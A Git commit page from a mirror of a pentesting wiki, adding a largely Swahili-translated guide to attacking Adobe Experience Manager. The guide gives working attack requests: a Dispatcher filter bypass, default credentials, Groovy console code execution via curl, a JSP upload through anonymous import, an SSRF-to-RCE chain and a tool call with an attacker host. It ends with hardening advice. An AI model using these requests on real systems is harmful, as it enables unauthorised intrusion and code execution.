maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/aem-adobe-ex

Browse Source
This commit is contained in:
Translator 2025-07-30 12:13:31 +00:00
parent 71f864c335
commit e7359ceefd
1 changed files with 115 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

118
src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
View File

@ -1,5 +1,117 @@
{{#include ../../banners/hacktricks-training.md}}
Pata udhaifu na mipangilio isiyo sahihi na [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker)
# AEM (Adobe Experience Manager) Pentesting
{{#include ../../banners/hacktricks-training.md}}
> Adobe Experience Manager (AEM, sehemu ya Adobe Experience Cloud) ni CMS ya biashara inayotumia Apache Sling/Felix (OSGi) na Java Content Repository (JCR).
> Kutoka kwa mtazamo wa mshambuliaji, mifano ya AEM mara nyingi huonyesha hatari za maendeleo, sheria dhaifu za Dispatcher, akreditivu za default na orodha ndefu ya CVEs ambazo zinarekebishwa kila robo mwaka.
Orodha ya ukaguzi hapa chini inazingatia **uso wa shambulio unaoweza kufikiwa kwa nje (unauth)** ambao unaendelea kuonekana katika ushirikiano halisi (2022-2025).
---
## 1. Fingerprinting
```
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```
Other quick indicators:
* `/etc.clientlibs/` njia ya kudumu iliyopo (inarudisha JS/CSS).
* `/libs/granite/core/content/login.html` ukurasa wa kuingia wenye bendera ya “Adobe Experience Manager”.
* `</script><!--/* CQ */-->` maoni chini ya HTML.
---
## 2. Mipaka ya juu ya thamani zisizo na uthibitisho
Path | Unachopata | Maelezo
---- | ------------- | -----
`/.json`, `/.1.json` | JCR nodes kupitia **DefaultGetServlet** | Mara nyingi imezuiwa, lakini *Dispatcher bypass* (ona hapa chini) inafanya kazi.
`/bin/querybuilder.json?path=/` | QueryBuilder API | Leak ya mti wa ukurasa, njia za ndani, majina ya watumiaji.
`/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 kwa kawaida; ikiwa imefunuliwa & sifa zimepatikana ⇒ bundle-upload RCE.
`/crx/packmgr/index.jsp` | Package Manager | Inaruhusu pakiti za maudhui zilizothibitishwa → kupakia mzigo wa JSP.
`/etc/groovyconsole/**` | AEM Groovy Console | Ikiwa imefunuliwa → utekelezaji wa Groovy / Java bila mipaka.
`/libs/cq/AuditlogSearchServlet.json` | Kumbukumbu za ukaguzi | Ufunuo wa taarifa.
`/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.
### Njia ya kupita ya Dispatcher
Sehemu nyingi za uzalishaji ziko nyuma ya *Dispatcher* (reverse-proxy). Kanuni zake za filtrering zinaweza kupitishwa kwa kuongeza kiambishi cha kudumu kilichoruhusiwa **baada ya alama ya semikolon au newline iliyosimbwa**:
```
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```
A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】
---
## 3. Makosa ya kawaida ya usanidi (bado yanaendelea mwaka 2025)
1. **Anonymous POST servlet** `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking `*.json` POST in the Dispatcher fixes it. 【】
2. **Profaili za watumiaji zinazoweza kusomwa na kila mtu** default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
3. **Akawali za default** `admin:admin`, `author:author`, `replication:replication`.
4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
5. **Groovy Console exposed** remote code execution by sending a Groovy script:
```bash
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
```
---
## 4. Uthibitisho wa hivi karibuni (mzunguko wa huduma)
Quarter | CVE | Affected | Impact
------- | --- | -------- | ------
Dec 2024 | **CVE-2024-43711** | 6.5.21 and earlier | Improper input validation → **Arbitrary code execution** (requires low-priv auth). 【】
Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard. 【】
Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL. 【】
Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-priv creds). 【】
Always check the *APSB* bulletin matching the customers service-pack and request the latest **6.5.22** or *Cloud Service 2024.11*.
---
## 5. Vipande vya unyakuzi
### 5.1 RCE kupitia bypass ya dispatcher + upakuaji wa JSP
If anonymous write is possible:
```
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```
Sasa omba `/content/evil.jsp` JSP inafanya kazi na mtumiaji wa mchakato wa AEM.
### 5.2 SSRF hadi RCE (historia < 6.3)
`/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`
`aem_ssrf2rce.py` kutoka **aem-hacker** inafanya otomatiki mnyororo mzima. 【】
---
## 6. Zana
* **aem-hacker** skripti ya kuorodhesha ya Swiss-army, inasaidia bypass ya dispatcher, ugunduzi wa SSRF, ukaguzi wa default-creds na zaidi.
```bash
python3 aem_hacker.py -u https://target --host attacker-ip
```【】
* **Content Brute-force** omba kwa kurudiwa `/_jcr_content.(json|html)` kugundua vipengele vilivyofichwa.
* **osgi-infect** pakia bundle ya OSGi yenye uharibifu kupitia `/system/console/bundles` ikiwa creds zinapatikana.
---
## 7. Orodha ya kuimarisha (kwa mapendekezo ya ripoti yako)
1. Hifadhi mfano kwenye **pakiti ya huduma ya hivi karibuni** (kuanzia Julai 2025: 6.5.22).
2. Ondoa/zungusha akaunti za default; tekeleza SSO/SAML.
3. Imarisha **Dispatcher filters** kataza `;`, mistari mipya iliyokodishwa, na `*.json` au `*.querybuilder.json` kwa watumiaji wasiojulikana.
4. Zima au linda consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) kwa orodha za ruhusa za IP.
5. Tekeleza pakiti ya *Anonymous Permission Hardening* iliyotolewa na Adobe.
## Marejeleo
* Adobe Security Bulletin APSB24-69 “Maktaba za usalama kwa Adobe Experience Manager (Desemba 2024)”.
* 0ang3el zana ya aem-hacker (GitHub).
{{#include ../../banners/hacktricks-training.md}}